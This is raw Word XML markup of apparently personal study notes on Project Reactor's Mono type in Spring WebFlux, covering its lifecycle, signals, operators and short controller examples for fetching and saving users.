      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive single response</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77558684"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0DCA9">
          <v:rect id="_x0000_i2227" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="271668F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for DB Calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C5C50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user/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B24ED6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User&gt; getUserById(@PathVariable String id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B41097"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findById(id);  // returns Mono&lt;User&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ED1C9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436F8FD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DF007">
          <v:rect id="_x0000_i2228" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EF39E0"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empty() and Mono.error()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598C146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 value, just completes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF6841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new Exception()); // emits an error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25361856"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1DEB99">
          <v:rect id="_x0000_i2229" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="275054B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2797"/>
      </w:tblGrid>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="61BF956A" w14:textId="77777777" w:rsidTr="004F1704">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FCEB02B"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47494A9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3EB44492" w14:textId="77777777" w:rsidTr="004F1704">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DD3E87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ype</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1588DDD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r>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="27A9EA8E" w14:textId="77777777" w:rsidTr="004F1704">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24B7745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2CF755F9"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3B1EB7A" w14:textId="77777777" w:rsidTr="004F1704">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C980C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ion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="302FC554"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es after emission</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="08ABDF2C" w14:textId="77777777" w:rsidTr="004F1704">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BA3777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lternative</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="592C044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Flux&lt;T&gt; for multiple items</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21A4D04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230" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5F5A95" w14:textId="4BD98E1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3" w:name="_Toc197867717"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain how Mono works</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="503"/>
    </w:p>
    <w:p w14:paraId="3FE8B1A6" w14:textId="1F853540"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lear breakdown of </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>how Mono works</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF3F2E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7A3D4">
          <v:rect id="_x0000_i2231" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BACB09"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Lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0BCB7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 Mono&lt;T&gt; is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive Publisher</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7188B0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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a data source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EAE14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s 0 or 1 value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D12D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Errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CF010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lazy</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — it doesn’t do anything until </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subscribed</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B67371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4E106">
          <v:rect id="_x0000_i2232" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B96D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Internally, Mono goes through:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A9F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reation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B8BB43"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just(value) → wraps a single value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F4C732"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thing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8A7214"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e) → emits an error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7047237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ption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74292B0E"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ubscriber subscribes to the Mono</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A659E3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triggers the processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57736DA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ignal Emission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0241CEE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of the following happens:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AB0860"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Next(value) → emits value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096D14E9"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Complete() → marks it done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C7E472"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rror(e) → emits error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6793ACE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950F6">
          <v:rect id="_x0000_i2233" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="275DCCD3"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ntrol Flow Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548794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mono = Mono.just("Hi")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705877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 -&gt; s + " Siddhant")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEB29CF"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Next(System.out::println)   // side effect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AF922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Success(val -&gt; System.out.println("Done"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E861B6F" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7" w:rsidP="00372576">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09D75F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subscribe();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26793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What happens:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1383151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is created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CDBA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transforms the data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7B665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logs it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421279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bscribe() starts the chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C9A9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E3C689">
          <v:rect id="_x0000_i2234" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="287308F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Operator Chain (Declarative)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602AA2D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supports operators like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB639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 transform data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC88EB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flatMap() – chain Monos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1894B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ilter() – conditionally pass values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760E293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 side effects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184F082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witchIfEmpty() – handle empty values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF99C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442F17">
          <v:rect id="_x0000_i2235" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F052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Saving User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5299297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ostMapping("/save")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D808C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ResponseEntity&lt;User&gt;&gt; saveUser(@RequestBody User user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D598A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save(user) // returns Mono&lt;User&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074D264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avedUser -&gt; ResponseEntity.ok(savedUser));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C1C72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66023C2B"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CF5D78">
          <v:rect id="_x0000_i2236" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECB3A6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Behind the scenes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558B5F4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works with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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED2D7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handles </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>backpressure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A4DF6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non-blocking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251AF9F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d with </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactor Core scheduler</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for async execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F51FA7"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1B5D0">
          <v:rect id="_x0000_i2237" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CBFABF"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022"/>
      </w:tblGrid>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="53E30ED5" w14:textId="77777777" w:rsidTr="00E034E7">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="305F4A4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2B0636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4F0DCBEA" w14:textId="77777777" w:rsidTr="00E034E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48BCF11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137A1F4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1E45888" w14:textId="77777777" w:rsidTr="00E034E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F54BEE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iggers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="512C77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on subscription</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="4E35FF9C" w14:textId="77777777" w:rsidTr="00E034E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20251DD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 model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AF5AE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async (Schedulers)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="6301EB16" w14:textId="77777777" w:rsidTr="00E034E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="089BD9D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perators</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E00E2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ich API for transformation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="42CB6CDE" w14:textId="77777777" w:rsidTr="00E034E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BA48D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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52CAA29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 calls, DB fetch, single result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C12B7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238" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4524A421" w14:textId="1799217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4" w:name="_Toc197867718"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What type of data does Mono represent</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="504"/>
    </w:p>
    <w:p w14:paraId="75CEAF58" w14:textId="3B110BE7"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represents</w:t>
      </w:r>
      <w:r w:rsidR="008911D3" w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008911D3" w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> single asynchronous value</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or no value at all).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1529C0E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A6BED">
          <v:rect id="_x0000_i2239" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDB049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etails:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564CBD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59116F44"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE66CC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can emit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE6F4E9"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xactly one item</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., Mono.just(data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4E95D0"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items</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., Mono.empty())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD6407A"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an </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Mono.error())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1874622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55D0">
          <v:rect id="_x0000_i2240" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E6909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2923"/>
      </w:tblGrid>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="1C76F12C" w14:textId="77777777" w:rsidTr="00E034E7">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F44E41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 Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10EE2E67"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6B46E1C4" w14:textId="77777777" w:rsidTr="00E034E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A0EF0F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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A3EEE4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ingle String value or nothing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="74E75885" w14:textId="77777777" w:rsidTr="00E034E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1950183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Void&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30BD9AC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 value, just completion signal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="0857B5C5" w14:textId="77777777" w:rsidTr="00E034E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A3BE8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User&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17468B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 object or none</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27E4F28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E7E9ED">
          <v:rect id="_x0000_i2241" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1539D69A"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66EAA1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greeting = Mono.just("Hello Siddhant!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5240618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nothing = Mono.empty();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEABDC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errorMono = Mono.error(new RuntimeException("Oops!"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7F628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o, Mono&lt;T&gt; = </w:t>
